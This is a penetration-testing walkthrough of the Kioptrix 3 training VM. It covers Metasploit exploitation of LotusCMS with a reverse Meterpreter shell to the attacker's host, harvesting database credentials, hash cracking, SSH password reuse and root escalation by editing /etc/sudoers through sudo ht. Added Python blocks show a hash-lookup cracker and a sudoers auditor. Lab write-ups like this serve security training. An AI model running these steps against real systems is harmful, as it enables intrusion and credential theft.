Walkthrough of Kioptrix 3 Machine - Vulnhub

Danish Zia
6 min readMar 2, 2020


Hi,

After my last article on the “Pentesting with Metasploit” course, I am starting to write regularly about attacking machines that are available for learning purposes. This write-up shows how to get root access on the Kioptrix 3 machine available on Vulnhub. Let’s get started.

Figure 1.0

Reconnaissance:

To find the target machine on the local network, use netdiscover:

netdiscover -i eth0

Figure 1.1

Our target machine is 192.168.1.25, as shown in figure 1.1. Let’s move forward.

Scanning:

For scanning we will use nmap. The -A option enables OS detection, version detection, script scanning and traceroute in one run.

nmap -A 192.168.1.25

Let’s look at the result we get from the scan.

Figure 1.2

The scan shows two open ports on the machine:

  1. 22
  2. 80

SSH is running on port 22 and an HTTP server on port 80. Since HTTP means a web server, let’s open this IP in Firefox and see what is there.

Figure 1.3

The site belongs to “Ligoat Security”, which looks interesting. Let’s explore it and move to the blog section.

Figure 1.4

Nothing useful on this page either. Let’s check the login page:

Figure 1.5

And here we get our first clue: the login page says the site is powered by LotusCMS. Let’s search for an exploit for it.

Exploitation:

Let’s check whether there is any publicly available exploit for this specific technology. For this we will use searchsploit:

searchsploit lotuscms

Figure 1.6

Here we go: there is one public exploit for LotusCMS, and it is available as a Metasploit module. Let’s try it and see whether it succeeds.

To start Metasploit, type:

msfconsole

After Metasploit loads, search for LotusCMS with the search command:

search lotuscms

Figure 1.7

Select the exploit with the use command:

use exploit/multi/http/lcms_php_exec

LotusCMS is a PHP application and this module executes PHP code on the server, so we set a PHP payload:

set payload php/meterpreter/reverse_tcp

Figure 1.8

Now set the target and attacker hosts for the exploit. RHOSTS is the victim’s IP and LHOST is the attacker’s IP:

set RHOSTS 192.168.1.25

set LHOST 192.168.1.24

Figure 1.9

One more thing: set the URI to / with:

set URI /

Then check that every option the exploit and payload need is set before launching the attack:

show options

Figure 1.10

Everything looks right, so run the exploit with the exploit command:

exploit

Figure 1.11

The exploit succeeded and we have a Meterpreter reverse shell. Let’s list the current directory:

ls

Figure 1.12

Let’s drop to a system shell and upgrade it to a proper PTY with Python. Type shell in Meterpreter to get the exploited machine’s shell, then spawn bash through the pty module:

meterpreter > shell

python -c 'import pty; pty.spawn("/bin/bash")'

Figure 1.13

Privilege Escalation:

As we have successfully exploited the machine, we will now try to get root access on it. Let’s list the current directory:

ls -al

Figure 1.14

Let’s explore the gallery directory first and check its contents:

cd gallery

ls -al

Figure 1.15

There are a lot of files. Let’s start with gconfig.php; to see its content we use cat:

cat gconfig.php

Figure 1.16

Here we go: we have found the database password. Now we go back to the browser and navigate to phpMyAdmin at http://192.168.1.25/phpmyadmin .

Figure 1.17

Now we log in to the database with the credentials found in gconfig.php (figure 1.16):

Figure 1.18

Having accessed the database, let’s navigate to the gallery database as shown in figure 1.18.

Figure 1.19

Navigate to the dev_accounts table as shown in figure 1.19.

Figure 1.20

Here we go: we have found credentials. The passwords are stored as hashes, so first we look them up with CrackStation.

Figure 1.21

Password for dreg is Mast3r.

Figure 1.22

Password for loneferret is starwars
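CrackStation works as a lookup table: it has precomputed the digests of a huge wordlist and matches a submitted hash against them. The following Python example is added here and is not part of the original write-up; it does the same thing offline on a small scale. The dev_accounts rows and the wordlist are constructed for the example, and the assumption that the table holds unsalted MD5 hashes is mine (the page only shows CrackStation resolving them). A third, invented user with a password outside the wordlist shows the miss case.

```python
import hashlib

# Constructed sample standing in for the dev_accounts table. The digests are
# generated from the passwords recovered above so the block runs offline;
# unsalted MD5 is an assumption of this example. 'tester' is an invented row
# whose password is not in the wordlist, to show a miss.
SAMPLE_ROWS = {
    "dreg": hashlib.md5(b"Mast3r").hexdigest(),
    "loneferret": hashlib.md5(b"starwars").hexdigest(),
    "tester": hashlib.sha1(b"n0tInTheList!").hexdigest(),
}

# Constructed wordlist; in practice this would be rockyou.txt or similar.
WORDLIST = ["password", "123456", "starwars", "qwerty", "Mast3r", "letmein"]

# Hex digest length -> hashlib algorithm name for common unsalted hashes.
HASH_BY_LENGTH = {32: "md5", 40: "sha1", 64: "sha256"}


def guess_algorithm(digest):
    """Guess the unsalted hash algorithm from the hex digest length, or None."""
    if not digest or any(c not in "0123456789abcdef" for c in digest.lower()):
        return None
    return HASH_BY_LENGTH.get(len(digest))


def build_lookup(wordlist, algorithm):
    """Precompute digest -> plaintext for one algorithm (what a lookup table holds)."""
    hasher = getattr(hashlib, algorithm)
    return {hasher(word.encode()).hexdigest(): word for word in wordlist}


def crack_table(rows, wordlist):
    """Return {user: recovered password or None} for a {user: hex digest} mapping."""
    tables = {}   # one lookup table per algorithm, built lazily
    results = {}
    for user, digest in rows.items():
        algorithm = guess_algorithm(digest)
        if algorithm is None:
            results[user] = None          # unknown format: cannot look it up
            continue
        if algorithm not in tables:
            tables[algorithm] = build_lookup(wordlist, algorithm)
        results[user] = tables[algorithm].get(digest.lower())
    return results


if __name__ == "__main__":
    for user, password in crack_table(SAMPLE_ROWS, WORDLIST).items():
        print(f"{user}: {password if password else '<not in wordlist>'}")
```

The lookup is keyed on the digest rather than re-hashing the wordlist for every user, so adding more rows costs nothing once the table is built. A salted or deliberately slow hash (bcrypt, scrypt) defeats this precomputation, which is exactly why a CMS should never store unsalted MD5.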

Now let’s try these passwords on the SSH server running on the target machine. First we try the dreg account:

ssh dreg@192.168.1.25

Figure 1.23

It worked. It seems the passwords stored in the database are reused for the SSH accounts. Now let’s navigate to other directories:

cd ..

Figure 1.24

From figure 1.24 we can see that the dreg user has very limited access on the machine, so let’s try the loneferret user instead:

ssh loneferret@192.168.1.25

Figure 1.25

Explore the contents of the current directory:

ls -al

Figure 1.26

Let’s see what is in the CompanyPolicy.README file:

cat CompanyPolicy.README

Figure 1.27

Here we get a hint to run “sudo ht” on the terminal. Let’s try it:

sudo ht

Figure 1.28

An error occurs. To fix it we set the terminal type with export TERM=xterm, then run sudo ht again:

export TERM=xterm

sudo ht

Figure 1.29

This screen opens as a result of the sudo ht command. Press “Ctrl + F” to open the navigation window.

Figure 1.30

Go to Open, type the path of the sudoers file, /etc/sudoers, and press Enter.

Figure 1.31

Once the sudoers file is open, go to the loneferret line and append “/bin/sh” to the commands loneferret may run. This works because ht is running as root under sudo, so it can write /etc/sudoers even though loneferret cannot.

Figure 1.32

Save the file and exit back to the terminal. Now run “sudo /bin/sh” and confirm the current user with whoami:

sudo /bin/sh

whoami

Figure 1.33
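The root cause of this escalation is a sudo rule that grants an interactive editor: ht runs as root, so it can open and save /etc/sudoers, and from there any command can be whitelisted. The following Python example is added here and is not from the original write-up. It parses sudoers user specifications and flags rules that hand a non-root user a program capable of a shell escape or an arbitrary file write. Both sudoers excerpts are constructed for the example: the loneferret rule mirrors the one abused above but /usr/local/bin/ht is an assumed path, and the users alice and bob are invented for contrast.

```python
import os
import re

# Programs that give the caller a root shell or an arbitrary file write when run
# under sudo (editors, pagers, interpreters). ht is the one abused in this walkthrough.
SHELL_ESCAPE_CAPABLE = {
    "ht", "vi", "vim", "nano", "ed", "emacs", "less", "more", "man",
    "sh", "bash", "dash", "zsh", "python", "python3", "perl", "ruby",
    "awk", "find", "env", "tee", "cp", "mv",
}

# Constructed sudoers excerpt (not the real file from the VM). The loneferret rule
# mirrors the one abused above; /usr/local/bin/ht is an assumed path. alice and bob
# are invented for contrast.
WEAK_SUDOERS = """\
Defaults        env_reset
root            ALL=(ALL) ALL
loneferret      ALL=NOPASSWD: /usr/local/bin/ht
alice           ALL=(ALL) NOPASSWD: !/usr/bin/su, /usr/bin/vim
bob             ALL=(root) /usr/sbin/service apache2 restart   # no shell escape
"""

# The same file with the editor grants removed: non-root users only get a
# specific, non-interactive command.
HARDENED_SUDOERS = """\
Defaults        env_reset
root            ALL=(ALL) ALL
loneferret      ALL=(root) /usr/sbin/service apache2 restart
bob             ALL=(root) /usr/sbin/service apache2 restart
"""

# user  host=(runas) [TAG:] cmd1, cmd2 ...   (the runas part is optional)
USER_SPEC = re.compile(r"^(\S+)\s+(\S+)\s*=\s*(?:\(([^)]*)\)\s*)?(.*)$")
TAG = re.compile(r"^(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV):\s*")
DIRECTIVES = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")


def parse_sudoers(text):
    """Yield (user, host, runas, nopasswd, command) for every command in each user spec."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments
        if not line or line.startswith(DIRECTIVES):
            continue
        match = USER_SPEC.match(line)
        if not match:
            continue
        user, host, runas, cmnd_list = match.groups()
        nopasswd = False
        for item in cmnd_list.split(","):
            item = item.strip()
            # A tag applies to its command and to every later command in the list.
            tag = TAG.match(item)
            while tag:
                if tag.group(1) == "NOPASSWD":
                    nopasswd = True
                elif tag.group(1) == "PASSWD":
                    nopasswd = False
                item = item[tag.end():]
                tag = TAG.match(item)
            if item:
                yield user, host, runas or "root", nopasswd, item


def audit_sudoers(text):
    """Return findings for rules that hand a non-root user a shell-escape-capable program."""
    findings = []
    for user, host, runas, nopasswd, command in parse_sudoers(text):
        if user == "root" or command.startswith("!"):
            continue                              # root needs no escalation; '!' is a denial
        binary = command.split()[0]
        name = os.path.basename(binary)
        if binary == "ALL" or name in SHELL_ESCAPE_CAPABLE:
            findings.append({
                "user": user,
                "runas": runas,
                "command": command,
                "nopasswd": nopasswd,
                "reason": ("ALL commands" if binary == "ALL"
                           else f"{name} can spawn a shell or write any file as {runas}"),
            })
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_SUDOERS), ("hardened", HARDENED_SUDOERS)):
        print(f"{label}: {audit_sudoers(text) or 'no findings'}")
```

Run it directly to compare the two files. The denial entry for alice (!/usr/bin/su) is skipped rather than counted as a fix, since the vim grant on the same line is enough on its own; the only real remedy is to not grant an editor, pager or interpreter under sudo at all, or to use sudoedit for the one file a user genuinely needs to change.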

Woohoo! We are root. Now use ls to list the current directory contents and pwd to print the current path:

ls

pwd

Figure 1.34

Now we can navigate to the root directory without any restrictions:

cd /root

ls

Figure 1.35

We have found a “Congrats.txt” file. Let’s read its content with cat:

cat Congrats.txt

Figure 1.36

Here we go: we have completed the walkthrough of the Kioptrix 3 machine successfully. I hope you enjoyed it. Thanks for staying till the end! :-)
